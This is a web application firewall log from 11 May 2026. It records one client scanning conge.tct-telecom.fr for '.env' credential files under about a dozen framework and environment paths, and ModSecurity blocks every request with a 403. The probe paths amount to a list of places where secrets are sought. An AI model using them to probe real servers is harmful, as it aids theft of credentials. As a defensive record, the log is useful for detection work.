[Mon May 11 15:50:09.393423 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/html/.env"] [unique_id "agHekay-5-wpj6Sx56aipQAAABc"]
[Mon May 11 15:50:09.393829 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/html/.env"] [unique_id "agHekay-5-wpj6Sx56aipQAAABc"]
[Mon May 11 15:50:09.394028 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/html/.env"] [unique_id "agHekay-5-wpj6Sx56aipQAAABc"]
[Mon May 11 15:50:09.498885 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /live/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/live/.env"] [unique_id "agHekay-5-wpj6Sx56aipwAAABc"]
[Mon May 11 15:50:09.499307 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/live/.env"] [unique_id "agHekay-5-wpj6Sx56aipwAAABc"]
[Mon May 11 15:50:09.499507 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/live/.env"] [unique_id "agHekay-5-wpj6Sx56aipwAAABc"]
[Mon May 11 15:50:09.593180 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/prod/.env"] [unique_id "agHekay-5-wpj6Sx56aiqAAAABc"]
[Mon May 11 15:50:09.593554 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/prod/.env"] [unique_id "agHekay-5-wpj6Sx56aiqAAAABc"]
[Mon May 11 15:50:09.593737 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/prod/.env"] [unique_id "agHekay-5-wpj6Sx56aiqAAAABc"]
[Mon May 11 15:50:09.690350 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/dev/.env"] [unique_id "agHekay-5-wpj6Sx56aiqQAAABc"]
[Mon May 11 15:50:09.690741 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/dev/.env"] [unique_id "agHekay-5-wpj6Sx56aiqQAAABc"]
[Mon May 11 15:50:09.690934 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/dev/.env"] [unique_id "agHekay-5-wpj6Sx56aiqQAAABc"]
[Mon May 11 15:50:09.786265 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/staging/.env"] [unique_id "agHekay-5-wpj6Sx56aiqwAAABc"]
[Mon May 11 15:50:09.786625 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/staging/.env"] [unique_id "agHekay-5-wpj6Sx56aiqwAAABc"]
[Mon May 11 15:50:09.786806 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/staging/.env"] [unique_id "agHekay-5-wpj6Sx56aiqwAAABc"]
[Mon May 11 15:50:09.880538 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /opt/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/opt/.env"] [unique_id "agHekay-5-wpj6Sx56airQAAABc"]
[Mon May 11 15:50:09.880914 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/opt/.env"] [unique_id "agHekay-5-wpj6Sx56airQAAABc"]
[Mon May 11 15:50:09.881099 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/opt/.env"] [unique_id "agHekay-5-wpj6Sx56airQAAABc"]
[Mon May 11 15:50:09.976521 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/laravel/.env"] [unique_id "agHekay-5-wpj6Sx56airgAAABc"]
[Mon May 11 15:50:09.976884 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/laravel/.env"] [unique_id "agHekay-5-wpj6Sx56airgAAABc"]
[Mon May 11 15:50:09.977067 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/laravel/.env"] [unique_id "agHekay-5-wpj6Sx56airgAAABc"]
[Mon May 11 15:50:10.071244 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /symfony/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/symfony/.env"] [unique_id "agHekqy-5-wpj6Sx56aisAAAABc"]
[Mon May 11 15:50:10.071664 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/symfony/.env"] [unique_id "agHekqy-5-wpj6Sx56aisAAAABc"]
[Mon May 11 15:50:10.071865 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/symfony/.env"] [unique_id "agHekqy-5-wpj6Sx56aisAAAABc"]
[Mon May 11 15:50:10.165658 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wordpress/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/wordpress/.env"] [unique_id "agHekqy-5-wpj6Sx56aisgAAABc"]
[Mon May 11 15:50:10.166078 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/wordpress/.env"] [unique_id "agHekqy-5-wpj6Sx56aisgAAABc"]
[Mon May 11 15:50:10.166284 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/wordpress/.env"] [unique_id "agHekqy-5-wpj6Sx56aisgAAABc"]
[Mon May 11 15:50:10.262225 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/wp/.env"] [unique_id "agHekqy-5-wpj6Sx56aitAAAABc"]
[Mon May 11 15:50:10.262635 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/wp/.env"] [unique_id "agHekqy-5-wpj6Sx56aitAAAABc"]
[Mon May 11 15:50:10.262822 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/wp/.env"] [unique_id "agHekqy-5-wpj6Sx56aitAAAABc"]
[Mon May 11 15:50:10.356973 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cms/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/cms/.env"] [unique_id "agHekqy-5-wpj6Sx56aitwAAABc"]
[Mon May 11 15:50:10.357419 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/cms/.env"] [unique_id "agHekqy-5-wpj6Sx56aitwAAABc"]
[Mon May 11 15:50:10.357614 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/cms/.env"] [unique_id "agHekqy-5-wpj6Sx56aitwAAABc"]
[Mon May 11 15:50:10.453020 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /drupal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/drupal/.env"] [unique_id "agHekqy-5-wpj6Sx56aiugAAABc"]
[Mon May 11 15:50:10.453532 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/drupal/.env"] [unique_id "agHekqy-5-wpj6Sx56aiugAAABc"]
[Mon May 11 15:50:10.453785 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/drupal/.env"] [unique_id "agHekqy-5-wpj6Sx56aiugAAABc"]
[Mon May 11 15:50:10.549804 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /joomla/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/joomla/.env"] [unique_id "agHekqy-5-wpj6Sx56aivQAAABc"]
[Mon May 11 15:50:10.550250 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/joomla/.env"] [unique_id "agHekqy-5-wpj6Sx56aivQAAABc"]
[Mon May 11 15:50:10.550468 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/joomla/.env"] [unique_id "agHekqy-5-wpj6Sx56aivQAAABc"]
